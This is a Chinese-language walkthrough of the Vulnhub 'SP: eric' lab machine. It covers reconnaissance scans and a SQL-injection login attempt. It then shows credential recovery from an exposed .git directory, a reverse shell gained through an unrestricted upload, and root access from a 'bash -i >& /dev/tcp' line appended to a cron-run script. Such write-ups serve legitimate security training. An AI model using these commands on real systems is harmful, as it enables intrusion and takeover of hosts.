Vulnhub之Eric靶机详细测试过程
Eric
作者: jason_huawen
靶机信息
名称:SP: eric
地址:
https://www.vulnhub.com/entry/sp-eric,274/
识别目标主机IP地址
─(kali㉿kali)-[~/Desktop/Vulnhub/Eric]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:e5:b4:f2 1 60 PCS Systemtechnik GmbH
192.168.56.149 08:00:27:f0:b6:e3 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.149
NMAP扫描
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Eric]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.149 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-11 21:49 EST
Nmap scan report for bogon (192.168.56.149)
Host is up (0.00026s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d3:79:15:3d:11:4c:af:26:6c:b2:af:6a:0b:99:14:fd (RSA)
| 256 87:48:76:38:81:c2:a0:50:cd:4c:39:c0:7c:7a:07:40 (ECDSA)
|_ 256 8e:b9:dd:8d:14:9b:e3:63:1d:d7:0e:54:98:8d:29:5b (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-git:
| 192.168.56.149:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: minor changes
|_http-title: Blog under construction
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:F0:B6:E3 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.11 seconds
NMAP扫描结果表明目标主机有2个开放端口:22(SSH)、80(HTTP)
值得注意的是NMAP对80端口的扫描有以下两点信息指的注意:
-
可能是blog网站
-
有个/.git目录,需要用相关的工具进行分析。
获得Shell
──(kali㉿kali)-[~/Desktop/Vulnhub/Eric]
└─$ curl -s http://192.168.56.149/
<html>
<head>
<title>Blog under construction</title>
</head>
<body>
<h1>Blog under construction</h1>
<p>As a hobby project I'm learning about web development and therefore going to build this blog as a learning process. Please come back when it's finished!</p>
</body>
</html>
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Eric]
└─$ curl -s http://192.168.56.149/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /robots.txt was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.56.149 Port 80</address>
</body></html>
看下/.git目录
但是访问该目录,返回信息:Forbidden,因此可能需要相应的工具或者目录扫描工具扫描其下级的目录文件,暂时搁置。
──(kali㉿kali)-[~/Desktop/Vulnhub/Eric]
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Eric]
└─$ nikto -h http://192.168.56.149
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.149
+ Target Hostname: 192.168.56.149
+ Target Port: 80
+ Start Time: 2023-01-11 21:54:20 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Cookie PHPSESSID created without the httponly flag
+ OSVDB-29786: /admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-29786: /admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-3092: /admin.php: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /.git/index: Git Index file may contain directory listing information.
+ /.git/HEAD: Git HEAD file found. Full repo details may be present.
+ /.git/config: Git config file found. Infos about repo details may be present.
+ 7915 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2023-01-11 21:55:25 (GMT-5) (65 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
访问/admin.php文件,并提交admin' or 1=1 -- , 尝试绕过登录,结果返回:
Wrong username and/or password. Don't even bother bruteforcing.
哈哈,看能不能扫出其他目录来吧
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Eric]
└─$ gobuster dir -u http://192.168.56.149 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.149
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Timeout: 10s
===============================================================
2023/01/11 21:57:09 Starting gobuster in directory enumeration mode
===============================================================
/upload (Status: 301) [Size: 317] [--> http://192.168.56.149/upload/]
/server-status (Status: 403) [Size: 302]
Progress: 219243 / 220561 (99.40%)
===============================================================
2023/01/11 21:57:46 Finished
===============================================================
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Eric]
└─$ gobuster dir -u http://192.168.56.149 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh,.js
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.149
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Extensions: php,html,txt,sh,js
[+] Timeout: 10s
===============================================================
2023/01/11 21:57:55 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 293]
/index.php (Status: 200) [Size: 281]
/.html (Status: 403) [Size: 294]
/admin.php (Status: 200) [Size: 306]
/upload (Status: 301) [Size: 317] [--> http://192.168.56.149/upload/]
/.html (Status: 403) [Size: 294]
/.php (Status: 403) [Size: 293]
/server-status (Status: 403) [Size: 302]
Progress: 1321836 / 1323366 (99.88%)
===============================================================
2023/01/11 22:02:53 Finished
===============================================================
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Eric]
└─$ dirb http://192.168.56.149
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Jan 11 22:02:59 2023
URL_BASE: http://192.168.56.149/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.149/ ----
+ http://192.168.56.149/.git/HEAD (CODE:200|SIZE:23)
+ http://192.168.56.149/admin.php (CODE:200|SIZE:306)
+ http://192.168.56.149/index.php (CODE:200|SIZE:281)
+ http://192.168.56.149/server-status (CODE:403|SIZE:302)
==> DIRECTORY: http://192.168.56.149/upload/
---- Entering directory: http://192.168.56.149/upload/ ----
-----------------
END_TIME: Wed Jan 11 22:03:04 2023
DOWNLOADED: 9224 - FOUND: 4
看来接下来需要用git工具分析目标主机上的仓库。
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Eric/GitHack-master]
└─$ ls
data GitHack.py lib LICENSE README.md
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Eric/GitHack-master]
└─$ python2 GitHack.py http://192.168.56.149/.git/
____ _ _ _ _ _
/ ___(_) |_| | | | __ _ ___| | __
| | _| | __| |_| |/ _` |/ __| |/ /
| |_| | | |_| _ | (_| | (__| <
\____|_|\__|_| |_|\__,_|\___|_|\_\{0.0.5}
A '.git' folder disclosure exploit.
[*] Check Depends
[+] Check depends end
[*] Set Paths
[*] Target Url: http://192.168.56.149/.git/
[*] Initialize Target
[*] Try to Clone straightly
[*] Clone
Cloning into '/home/kali/Desktop/Vulnhub/Eric/GitHack-master/dist/192.168.56.149'...
fatal: repository 'http://192.168.56.149/.git/' not found
[-] Clone Error
[*] Try to Clone with Directory Listing
[*] http://192.168.56.149/.git/ is not support Directory Listing
[-] [Skip][First Try] Target is not support Directory Listing
[*] Try to clone with Cache
[*] Initialize Git
[!] Initialize Git Error: hint: Using 'master' as the name for the initial branch. This default branch name
hint: is subject to change. To configure the initial branch name to use in all
hint: of your new repositories, which will suppress this warning, call:
hint:
hint: git config --global init.defaultBranch <name>
hint:
hint: Names commonly chosen instead of 'master' are 'main', 'trunk' and
hint: 'development'. The just-created branch can be renamed via this command:
hint:
hint: git branch -m <name>
[*] Cache files
[*] packed-refs
[*] config
[*] HEAD
[*] COMMIT_EDITMSG
[*] ORIG_HEAD
[*] FETCH_HEAD
[*] refs/heads/master
[*] refs/remote/master
[*] index
[*] logs/HEAD
[*] logs/refs/heads/master
[*] Fetch Commit Objects
[*] objects/3d/b5628b550f5c9c9f6f663cd158374035a6eaa0
[*] objects/31/33d44be3eebe6c6761b50c6fdf5b7fb664c2d8
[*] objects/a8/9a716b3c21d8f9fee38a0693afb22c75f1d31c
[*] objects/f0/d95f54335626ce6c96522e0a9105780b3366c5
[*] objects/c0/951efcb330fc310911d714acf03b873aa9ab43
[*] objects/23/448969d5b347f8e91f8017b4d8ef6edf6161d8
[*] objects/cc/1ab96950f56d1fff0d1f006821cab6b6b0e249
[*] objects/3d/8e9ce9093fc391845dd69b0436b258ac4a6387
[*] objects/e7/ba67226cda1ecc1bd3a2537f0be94343d448bb
[*] Fetch Commit Objects End
[*] logs/refs/remote/master
[*] logs/refs/stash
[*] refs/stash
[*] Valid Repository
[+] Valid Repository Success
[+] Clone Success. Dist File : /home/kali/Desktop/Vulnhub/Eric/GitHack-master/dist/192.168.56.149
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Eric/GitHack-master]
└─$ ls -alh
total 68K
drwxr-xr-x 5 kali kali 4.0K Jan 11 22:09 .
drwxr-xr-x 3 kali kali 4.0K Jan 11 22:08 ..
drwxr-xr-x 2 kali kali 4.0K Jan 11 22:08 data
drwxr-xr-x 3 kali kali 4.0K Jan 11 22:09 dist
-rwxr-xr-x 1 kali kali 809 Jan 11 22:08 GitHack.py
-rw-r--r-- 1 kali kali 45 Jan 11 22:08 .gitignore
drwxr-xr-x 3 kali kali 4.0K Jan 11 22:09 lib
-rw-r--r-- 1 kali kali 35K Jan 11 22:08 LICENSE
-rw-r--r-- 1 kali kali 805 Jan 11 22:08 README.md
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Eric/GitHack-master]
└─$ cd dist
┌──(kali㉿kali)-[~/…/Vulnhub/Eric/GitHack-master/dist]
└─$ ls -alh
total 12K
drwxr-xr-x 3 kali kali 4.0K Jan 11 22:09 .
drwxr-xr-x 5 kali kali 4.0K Jan 11 22:09 ..
drwxr-xr-x 3 kali kali 4.0K Jan 11 22:09 192.168.56.149
┌──(kali㉿kali)-[~/…/Vulnhub/Eric/GitHack-master/dist]
└─$ cd 192.168.56.149
┌──(kali㉿kali)-[~/…/Eric/GitHack-master/dist/192.168.56.149]
└─$ ls
admin.php index.php
┌──(kali㉿kali)-[~/…/Eric/GitHack-master/dist/192.168.56.149]
└─$ cat admin.php
<?php
ob_start();
session_start();
if ($_POST['submit']) {
if ($_POST['username'] == 'admin' && $_POST['password'] == 'st@mpch0rdt.ightiRu$glo0mappL3') {
$_SESSION['auth'] = 1;
} else {
exit("Wrong username and/or password. Don't even bother bruteforcing.");
}
}
// Todo: Make sure it is only allowed to upload images.
if ($_POST['submit_post']) {
if (move_uploaded_file($_FILES['image']['tmp_name'], 'upload/' . $_FILES['image']['name'])) {
}
}
?>
<html>
<head>
<title>admin login</title>
</head>
<body>
<?php
if (!isset($_SESSION['auth'])) {
?>
<form action="admin.php" method="post">
<input name="username" type="text" placeholder="Username" />
<input name="password" type="password" placeholder="Password" /><br />
<input name="submit" type="submit" value="Login"/>
</form>
<?php
} else {
?>
<h1>Add new post (under construction)</h1>
<form action="admin.php" method="post" enctype="multipart/form-data">
<input name="post_title" type="text" placeholder="Title"><br />
<textarea name="post_body" cols="40" rows="3" placeholder="Body"></textarea><br />
<input name="image" type="file" placeholder="Image" />
<input type="submit" name="submit_post" value="Upload"/>
</form>
<h1>Add site to blogroll</h1>
<input name="blogroll_add" type="text"/><br/>
<input name="blogroll_submit" type="submit" value="add"/>
<?php
}
?>
</body>
</html>
┌──(kali㉿kali)-[~/…/Eric/GitHack-master/dist/192.168.56.149]
└─$
githack工具发现了admin的密码
可以成功登陆/admin.php,该页面可以上传文件,虽然没有提示是否上传成功,但是当访问/upload/shell.php,发现已经成功得到反弹回来的shell, upload目录在目录扫描阶段的是会有已经得到。
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Eric]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.149] 38574
Linux eric 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
04:13:12 up 26 min, 0 users, load average: 0.00, 0.67, 1.25
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@eric:/$ cd /home
cd /home
www-data@eric:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x 3 root root 4.0K Oct 28 2018 .
drwxr-xr-x 22 root root 4.0K Oct 21 2018 ..
drwxr-xr-x 4 eric eric 4.0K Jan 12 04:12 eric
www-data@eric:/home$ cd eric
cd eric
www-data@eric:/home/eric$ ls -alh
ls -alh
total 64K
drwxr-xr-x 4 eric eric 4.0K Jan 12 04:12 .
drwxr-xr-x 3 root root 4.0K Oct 28 2018 ..
-rw------- 1 eric eric 81 Dec 23 2018 .bash_history
-rw-r--r-- 1 eric eric 220 Oct 28 2018 .bash_logout
-rw-r--r-- 1 eric eric 3.7K Oct 28 2018 .bashrc
drwx------ 2 eric eric 4.0K Oct 28 2018 .cache
drwxrwxr-x 3 eric eric 4.0K Oct 28 2018 .local
-rw-r--r-- 1 eric eric 807 Oct 28 2018 .profile
-rw-r--r-- 1 eric eric 0 Oct 28 2018 .sudo_as_admin_successful
-rwxrwxrwx 1 root root 55 Oct 28 2018 backup.sh
-rw-r--r-- 1 root root 24K Jan 12 04:12 backup.zip
-rw-r--r-- 1 root root 13 Oct 28 2018 flag.txt
www-data@eric:/home/eric$ cat flag.txt
cat flag.txt
89340a834323
www-data@eric:/home/eric$ cat backup.sh
cat backup.sh
#!/bin/bash
zip -r /home/eric/backup.zip /var/www/html
www-data@eric:/home/eric$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
www-data@eric:/home/eric$
对backup.sh文件有读写权限,可以追加反向shell,后台应该运行cron任务,从而得到root权限
提权
www-data@eric:/home/eric$ echo 'bash -i >& /dev/tcp/192.168.56.146/6666 0>&1' >> backup.sh
< >& /dev/tcp/192.168.56.146/6666 0>&1' >> backup.sh
www-data@eric:/home/eric$ cat backup.sh
cat backup.sh
#!/bin/bash
zip -r /home/eric/backup.zip /var/www/html
bash -i >& /dev/tcp/192.168.56.146/6666 0>&1
www-data@eric:/home/eric$
┌──(kali㉿kali)-[~/Desktop/Toolsets/GitHack-master]
└─$ sudo nc -nlvp 6666
[sudo] password for kali:
listening on [any] 6666 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.149] 41466
bash: cannot set terminal process group (794): Inappropriate ioctl for device
bash: no job control in this shell
root@eric:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@eric:~# cd /root
cd /root
root@eric:~# ls -alh
ls -alh
total 32K
drwx------ 3 root root 4.0K Dec 23 2018 .
drwxr-xr-x 22 root root 4.0K Oct 21 2018 ..
-rw------- 1 root root 275 Dec 23 2018 .bash_history
-rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc
-rw-r--r-- 1 root root 21 Oct 28 2018 flag.txt
drwxr-xr-x 3 root root 4.0K Oct 28 2018 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 66 Oct 28 2018 .selected_editor
root@eric:~# cat flag.txt
cat flag.txt
6a347b975dd18ae6497c
root@eric:~#
至此成功得到root shell,拿到了root flag.
STRIVE FOR PROGRESS,NOT FOR PERFECTION
